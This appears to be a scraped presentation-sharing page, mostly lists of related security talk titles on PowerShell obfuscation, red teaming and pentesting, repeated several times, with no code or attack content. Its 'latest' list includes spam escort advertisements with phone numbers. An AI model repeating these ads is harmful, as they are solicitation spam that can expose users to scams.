Malicious Payloads vs Deep Visibility: A PowerShell StoryDaniel Bohannon
 
DevSec Defense
DevSec DefenseDevSec Defense
DevSec DefenseDaniel Bohannon
 
Revoke-Obfuscation
Revoke-ObfuscationRevoke-Obfuscation
Revoke-ObfuscationDaniel Bohannon
 
[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...
[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...
[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...CODE BLUE
 
PesterSec: Using Pester & ScriptAnalyzer to Detect Obfuscated PowerShell
PesterSec: Using Pester & ScriptAnalyzer to Detect Obfuscated PowerShellPesterSec: Using Pester & ScriptAnalyzer to Detect Obfuscated PowerShell
PesterSec: Using Pester & ScriptAnalyzer to Detect Obfuscated PowerShellDaniel Bohannon
 
Invoke-Obfuscation DerbyCon 2016
Invoke-Obfuscation DerbyCon 2016Invoke-Obfuscation DerbyCon 2016
Invoke-Obfuscation DerbyCon 2016Daniel Bohannon
 
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2Chris Gates
 
An Abusive Relationship with AngularJS by Mario Heiderich - CODE BLUE 2015
An Abusive Relationship with AngularJS by Mario Heiderich - CODE BLUE 2015An Abusive Relationship with AngularJS by Mario Heiderich - CODE BLUE 2015
An Abusive Relationship with AngularJS by Mario Heiderich - CODE BLUE 2015CODE BLUE
 
[CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland
[CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland[CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland
[CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani GolandCODE BLUE
 
Internal Pentest: from z3r0 to h3r0
Internal Pentest: from z3r0 to h3r0Internal Pentest: from z3r0 to h3r0
Internal Pentest: from z3r0 to h3r0marcioalma
 
Protect Your Payloads: Modern Keying Techniques
Protect Your Payloads: Modern Keying TechniquesProtect Your Payloads: Modern Keying Techniques
Protect Your Payloads: Modern Keying TechniquesLeo Loobeek
 
Big Bang Theory: The Evolution of Pentesting High Security Enviroments IT Def...
Big Bang Theory: The Evolution of Pentesting High Security Enviroments IT Def...Big Bang Theory: The Evolution of Pentesting High Security Enviroments IT Def...
Big Bang Theory: The Evolution of Pentesting High Security Enviroments IT Def...Chris Gates
 
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Rob Fuller
 
External to DA, the OS X Way
External to DA, the OS X WayExternal to DA, the OS X Way
External to DA, the OS X WayStephan Borosh
 
How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)Larry Cashdollar
 
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class Chris Gates
 
Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operationsSunny Neo
 
Offensive Python for Pentesting
Offensive Python for PentestingOffensive Python for Pentesting
Offensive Python for PentestingMike Felch
 
Fantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find ThemFantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find ThemRoss Wolf
 
Top Security Challenges Facing Credit Unions Today
Top Security Challenges Facing Credit Unions TodayTop Security Challenges Facing Credit Unions Today
Top Security Challenges Facing Credit Unions TodayChris Gates
 
Lares from LOW to PWNED
Lares from LOW to PWNEDLares from LOW to PWNED
Lares from LOW to PWNEDChris Gates
 
I hunt sys admins 2.0
I hunt sys admins 2.0I hunt sys admins 2.0
I hunt sys admins 2.0Will Schroeder
 
Why isn't infosec working? Did you turn it off and back on again?
Why isn't infosec working? Did you turn it off and back on again?Why isn't infosec working? Did you turn it off and back on again?
Why isn't infosec working? Did you turn it off and back on again?Rob Fuller
 
Beyond Automated Testing - RVAsec 2016
Beyond Automated Testing - RVAsec 2016Beyond Automated Testing - RVAsec 2016
Beyond Automated Testing - RVAsec 2016Andrew McNicol
 
Outlook and Exchange for the bad guys
Outlook and Exchange for the bad guysOutlook and Exchange for the bad guys
Outlook and Exchange for the bad guysNick Landers
 
Big problems with big data – Hadoop interfaces security
Big problems with big data – Hadoop interfaces securityBig problems with big data – Hadoop interfaces security
Big problems with big data – Hadoop interfaces securitySecuRing
 
Defeating firefox by Muneaki Nishimunea - CODE BLUE 2015
Defeating firefox by Muneaki Nishimunea - CODE BLUE 2015Defeating firefox by Muneaki Nishimunea - CODE BLUE 2015
Defeating firefox by Muneaki Nishimunea - CODE BLUE 2015CODE BLUE
 
Weaponizing Your DevOps Pipeline
Weaponizing Your DevOps PipelineWeaponizing Your DevOps Pipeline
Weaponizing Your DevOps PipelinePuma Security, LLC
 
2016, A New Era of OS and Cloud Security - Tudor Damian
2016, A New Era of OS and Cloud Security - Tudor Damian2016, A New Era of OS and Cloud Security - Tudor Damian
2016, A New Era of OS and Cloud Security - Tudor DamianITCamp
 

Más contenido relacionado

La actualidad más candente

An Abusive Relationship with AngularJS by Mario Heiderich - CODE BLUE 2015
An Abusive Relationship with AngularJS by Mario Heiderich - CODE BLUE 2015An Abusive Relationship with AngularJS by Mario Heiderich - CODE BLUE 2015
An Abusive Relationship with AngularJS by Mario Heiderich - CODE BLUE 2015CODE BLUE
 
[CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland
[CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland[CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland
[CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani GolandCODE BLUE
 
Internal Pentest: from z3r0 to h3r0
Internal Pentest: from z3r0 to h3r0Internal Pentest: from z3r0 to h3r0
Internal Pentest: from z3r0 to h3r0marcioalma
 
Protect Your Payloads: Modern Keying Techniques
Protect Your Payloads: Modern Keying TechniquesProtect Your Payloads: Modern Keying Techniques
Protect Your Payloads: Modern Keying TechniquesLeo Loobeek
 
Big Bang Theory: The Evolution of Pentesting High Security Enviroments IT Def...
Big Bang Theory: The Evolution of Pentesting High Security Enviroments IT Def...Big Bang Theory: The Evolution of Pentesting High Security Enviroments IT Def...
Big Bang Theory: The Evolution of Pentesting High Security Enviroments IT Def...Chris Gates
 
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Rob Fuller
 
External to DA, the OS X Way
External to DA, the OS X WayExternal to DA, the OS X Way
External to DA, the OS X WayStephan Borosh
 
How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)Larry Cashdollar
 
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class Chris Gates
 
Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operationsSunny Neo
 
Offensive Python for Pentesting
Offensive Python for PentestingOffensive Python for Pentesting
Offensive Python for PentestingMike Felch
 
Fantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find ThemFantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find ThemRoss Wolf
 
Top Security Challenges Facing Credit Unions Today
Top Security Challenges Facing Credit Unions TodayTop Security Challenges Facing Credit Unions Today
Top Security Challenges Facing Credit Unions TodayChris Gates
 
Lares from LOW to PWNED
Lares from LOW to PWNEDLares from LOW to PWNED
Lares from LOW to PWNEDChris Gates
 
Why isn't infosec working? Did you turn it off and back on again?
Why isn't infosec working? Did you turn it off and back on again?Why isn't infosec working? Did you turn it off and back on again?
Why isn't infosec working? Did you turn it off and back on again?Rob Fuller
 
Beyond Automated Testing - RVAsec 2016
Beyond Automated Testing - RVAsec 2016Beyond Automated Testing - RVAsec 2016
Beyond Automated Testing - RVAsec 2016Andrew McNicol
 
Outlook and Exchange for the bad guys
Outlook and Exchange for the bad guysOutlook and Exchange for the bad guys
Outlook and Exchange for the bad guysNick Landers
 
Big problems with big data – Hadoop interfaces security
Big problems with big data – Hadoop interfaces securityBig problems with big data – Hadoop interfaces security
Big problems with big data – Hadoop interfaces securitySecuRing
 
Defeating firefox by Muneaki Nishimunea - CODE BLUE 2015
Defeating firefox by Muneaki Nishimunea - CODE BLUE 2015Defeating firefox by Muneaki Nishimunea - CODE BLUE 2015
Defeating firefox by Muneaki Nishimunea - CODE BLUE 2015CODE BLUE
 

La actualidad más candente (20)

An Abusive Relationship with AngularJS by Mario Heiderich - CODE BLUE 2015
An Abusive Relationship with AngularJS by Mario Heiderich - CODE BLUE 2015An Abusive Relationship with AngularJS by Mario Heiderich - CODE BLUE 2015
An Abusive Relationship with AngularJS by Mario Heiderich - CODE BLUE 2015
 
[CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland
[CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland[CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland
[CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland
 
Internal Pentest: from z3r0 to h3r0
Internal Pentest: from z3r0 to h3r0Internal Pentest: from z3r0 to h3r0
Internal Pentest: from z3r0 to h3r0
 
Protect Your Payloads: Modern Keying Techniques
Protect Your Payloads: Modern Keying TechniquesProtect Your Payloads: Modern Keying Techniques
Protect Your Payloads: Modern Keying Techniques
 
Big Bang Theory: The Evolution of Pentesting High Security Enviroments IT Def...
Big Bang Theory: The Evolution of Pentesting High Security Enviroments IT Def...Big Bang Theory: The Evolution of Pentesting High Security Enviroments IT Def...
Big Bang Theory: The Evolution of Pentesting High Security Enviroments IT Def...
 
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
 
External to DA, the OS X Way
External to DA, the OS X WayExternal to DA, the OS X Way
External to DA, the OS X Way
 
How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)
 
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
 
Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operations
 
Offensive Python for Pentesting
Offensive Python for PentestingOffensive Python for Pentesting
Offensive Python for Pentesting
 
Fantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find ThemFantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find Them
 
Top Security Challenges Facing Credit Unions Today
Top Security Challenges Facing Credit Unions TodayTop Security Challenges Facing Credit Unions Today
Top Security Challenges Facing Credit Unions Today
 
Lares from LOW to PWNED
Lares from LOW to PWNEDLares from LOW to PWNED
Lares from LOW to PWNED
 
I hunt sys admins 2.0
I hunt sys admins 2.0I hunt sys admins 2.0
I hunt sys admins 2.0
 
Why isn't infosec working? Did you turn it off and back on again?
Why isn't infosec working? Did you turn it off and back on again?Why isn't infosec working? Did you turn it off and back on again?
Why isn't infosec working? Did you turn it off and back on again?
 
Beyond Automated Testing - RVAsec 2016
Beyond Automated Testing - RVAsec 2016Beyond Automated Testing - RVAsec 2016
Beyond Automated Testing - RVAsec 2016
 
Outlook and Exchange for the bad guys
Outlook and Exchange for the bad guysOutlook and Exchange for the bad guys
Outlook and Exchange for the bad guys
 
Big problems with big data – Hadoop interfaces security
Big problems with big data – Hadoop interfaces securityBig problems with big data – Hadoop interfaces security
Big problems with big data – Hadoop interfaces security
 
Defeating firefox by Muneaki Nishimunea - CODE BLUE 2015
Defeating firefox by Muneaki Nishimunea - CODE BLUE 2015Defeating firefox by Muneaki Nishimunea - CODE BLUE 2015
Defeating firefox by Muneaki Nishimunea - CODE BLUE 2015
 

Similar a SignaturesAreDead Long Live RESILIENT Signatures

Weaponizing Your DevOps Pipeline
Weaponizing Your DevOps PipelineWeaponizing Your DevOps Pipeline
Weaponizing Your DevOps PipelinePuma Security, LLC
 
2016, A New Era of OS and Cloud Security - Tudor Damian
2016, A New Era of OS and Cloud Security - Tudor Damian2016, A New Era of OS and Cloud Security - Tudor Damian
2016, A New Era of OS and Cloud Security - Tudor DamianITCamp
 
Detection Rules Coverage
Detection Rules CoverageDetection Rules Coverage
Detection Rules CoverageSunny Neo
 
2016, A new era of OS and Cloud Security
2016, A new era of OS and Cloud Security2016, A new era of OS and Cloud Security
2016, A new era of OS and Cloud SecurityTudor Damian
 
Beyond S3 Buckets - Effective Countermeasures for Emerging Cloud Threats
Beyond S3 Buckets - Effective Countermeasures for Emerging Cloud ThreatsBeyond S3 Buckets - Effective Countermeasures for Emerging Cloud Threats
Beyond S3 Buckets - Effective Countermeasures for Emerging Cloud ThreatsSBWebinars
 
Application security meetup k8_s security with zero trust_29072021
Application security meetup k8_s security with zero trust_29072021Application security meetup k8_s security with zero trust_29072021
Application security meetup k8_s security with zero trust_29072021lior mazor
 
Modern cybersecurity threats, and shiny new tools to help deal with them
Modern cybersecurity threats, and shiny new tools to help deal with themModern cybersecurity threats, and shiny new tools to help deal with them
Modern cybersecurity threats, and shiny new tools to help deal with themTudor Damian
 
Layer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wned
Layer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wnedLayer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wned
Layer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wnedfangjiafu
 
Modern cybersecurity threats, and shiny new tools to help deal with them - T...
Modern cybersecurity threats, and shiny new tools to help deal with them - T... Modern cybersecurity threats, and shiny new tools to help deal with them - T...
Modern cybersecurity threats, and shiny new tools to help deal with them - T...ITCamp
 
MITRE-Module 1 Slides.pdf
MITRE-Module 1 Slides.pdfMITRE-Module 1 Slides.pdf
MITRE-Module 1 Slides.pdfReZa AdineH
 
CodeMotion 2023 - Deep dive nella supply chain della nostra infrastruttura cl...
CodeMotion 2023 - Deep dive nella supply chain della nostra infrastruttura cl...CodeMotion 2023 - Deep dive nella supply chain della nostra infrastruttura cl...
CodeMotion 2023 - Deep dive nella supply chain della nostra infrastruttura cl...sparkfabrik
 
Evolution of Offensive Testing - ATT&CK-based Adversary Emulation Plans
Evolution of Offensive Testing - ATT&CK-based Adversary Emulation PlansEvolution of Offensive Testing - ATT&CK-based Adversary Emulation Plans
Evolution of Offensive Testing - ATT&CK-based Adversary Emulation PlansChristopher Korban
 
IRJET- A Study on Penetration Testing using Metasploit Framework
IRJET- A Study on Penetration Testing using Metasploit FrameworkIRJET- A Study on Penetration Testing using Metasploit Framework
IRJET- A Study on Penetration Testing using Metasploit FrameworkIRJET Journal
 
Penetration testing using metasploit framework
Penetration testing using metasploit frameworkPenetration testing using metasploit framework
Penetration testing using metasploit frameworkPawanKesharwani
 
Making the Case for Stronger Endpoint Data Visibility
Making the Case for Stronger Endpoint Data VisibilityMaking the Case for Stronger Endpoint Data Visibility
Making the Case for Stronger Endpoint Data Visibilitydianadvo
 
Operationalizing Security Intelligence
Operationalizing Security IntelligenceOperationalizing Security Intelligence
Operationalizing Security IntelligenceSplunk
 
Operational Security Intelligence
Operational Security IntelligenceOperational Security Intelligence
Operational Security IntelligenceSplunk
 
BlackHat Presentation - Lies and Damn Lies: Getting past the Hype of Endpoint...
BlackHat Presentation - Lies and Damn Lies: Getting past the Hype of Endpoint...BlackHat Presentation - Lies and Damn Lies: Getting past the Hype of Endpoint...
BlackHat Presentation - Lies and Damn Lies: Getting past the Hype of Endpoint...Mike Spaulding
 
Cisco Connect Toronto 2018 DNA assurance
Cisco Connect Toronto 2018 DNA assuranceCisco Connect Toronto 2018 DNA assurance
Cisco Connect Toronto 2018 DNA assuranceCisco Canada
 
Get Real-Time Cyber Threat Protection with Risk Management and SIEM
Get Real-Time Cyber Threat Protection with Risk Management and SIEMGet Real-Time Cyber Threat Protection with Risk Management and SIEM
Get Real-Time Cyber Threat Protection with Risk Management and SIEMRapid7
 

Similar a SignaturesAreDead Long Live RESILIENT Signatures (20)

Weaponizing Your DevOps Pipeline
Weaponizing Your DevOps PipelineWeaponizing Your DevOps Pipeline
Weaponizing Your DevOps Pipeline
 
2016, A New Era of OS and Cloud Security - Tudor Damian
2016, A New Era of OS and Cloud Security - Tudor Damian2016, A New Era of OS and Cloud Security - Tudor Damian
2016, A New Era of OS and Cloud Security - Tudor Damian
 
Detection Rules Coverage
Detection Rules CoverageDetection Rules Coverage
Detection Rules Coverage
 
2016, A new era of OS and Cloud Security
2016, A new era of OS and Cloud Security2016, A new era of OS and Cloud Security
2016, A new era of OS and Cloud Security
 
Beyond S3 Buckets - Effective Countermeasures for Emerging Cloud Threats
Beyond S3 Buckets - Effective Countermeasures for Emerging Cloud ThreatsBeyond S3 Buckets - Effective Countermeasures for Emerging Cloud Threats
Beyond S3 Buckets - Effective Countermeasures for Emerging Cloud Threats
 
Application security meetup k8_s security with zero trust_29072021
Application security meetup k8_s security with zero trust_29072021Application security meetup k8_s security with zero trust_29072021
Application security meetup k8_s security with zero trust_29072021
 
Modern cybersecurity threats, and shiny new tools to help deal with them
Modern cybersecurity threats, and shiny new tools to help deal with themModern cybersecurity threats, and shiny new tools to help deal with them
Modern cybersecurity threats, and shiny new tools to help deal with them
 
Layer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wned
Layer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wnedLayer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wned
Layer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wned
 
Modern cybersecurity threats, and shiny new tools to help deal with them - T...
Modern cybersecurity threats, and shiny new tools to help deal with them - T... Modern cybersecurity threats, and shiny new tools to help deal with them - T...
Modern cybersecurity threats, and shiny new tools to help deal with them - T...
 
MITRE-Module 1 Slides.pdf
MITRE-Module 1 Slides.pdfMITRE-Module 1 Slides.pdf
MITRE-Module 1 Slides.pdf
 
CodeMotion 2023 - Deep dive nella supply chain della nostra infrastruttura cl...
CodeMotion 2023 - Deep dive nella supply chain della nostra infrastruttura cl...CodeMotion 2023 - Deep dive nella supply chain della nostra infrastruttura cl...
CodeMotion 2023 - Deep dive nella supply chain della nostra infrastruttura cl...
 
Evolution of Offensive Testing - ATT&CK-based Adversary Emulation Plans
Evolution of Offensive Testing - ATT&CK-based Adversary Emulation PlansEvolution of Offensive Testing - ATT&CK-based Adversary Emulation Plans
Evolution of Offensive Testing - ATT&CK-based Adversary Emulation Plans
 
IRJET- A Study on Penetration Testing using Metasploit Framework
IRJET- A Study on Penetration Testing using Metasploit FrameworkIRJET- A Study on Penetration Testing using Metasploit Framework
IRJET- A Study on Penetration Testing using Metasploit Framework
 
Penetration testing using metasploit framework
Penetration testing using metasploit frameworkPenetration testing using metasploit framework
Penetration testing using metasploit framework
 
Making the Case for Stronger Endpoint Data Visibility
Making the Case for Stronger Endpoint Data VisibilityMaking the Case for Stronger Endpoint Data Visibility
Making the Case for Stronger Endpoint Data Visibility
 
Operationalizing Security Intelligence
Operationalizing Security IntelligenceOperationalizing Security Intelligence
Operationalizing Security Intelligence
 
Operational Security Intelligence
Operational Security IntelligenceOperational Security Intelligence
Operational Security Intelligence
 
BlackHat Presentation - Lies and Damn Lies: Getting past the Hype of Endpoint...
BlackHat Presentation - Lies and Damn Lies: Getting past the Hype of Endpoint...BlackHat Presentation - Lies and Damn Lies: Getting past the Hype of Endpoint...
BlackHat Presentation - Lies and Damn Lies: Getting past the Hype of Endpoint...
 
Cisco Connect Toronto 2018 DNA assurance
Cisco Connect Toronto 2018 DNA assuranceCisco Connect Toronto 2018 DNA assurance
Cisco Connect Toronto 2018 DNA assurance
 
Get Real-Time Cyber Threat Protection with Risk Management and SIEM
Get Real-Time Cyber Threat Protection with Risk Management and SIEMGet Real-Time Cyber Threat Protection with Risk Management and SIEM
Get Real-Time Cyber Threat Protection with Risk Management and SIEM
 

Último

Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Paola De la Torre
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Servicegiselly40
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxMalak Abu Hammad
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking MenDelhi Call girls
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Miguel Araújo
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxKatpro Technologies
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptxHampshireHUG
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityPrincipled Technologies
 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024Results
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024The Digital Insurer
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationRadu Cotescu
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Neo4j
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...gurkirankumar98700
 
Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live StreamsTop 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live StreamsRoshan Dwivedi
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Allon Mureinik
 

Último (20)

Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
 
Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
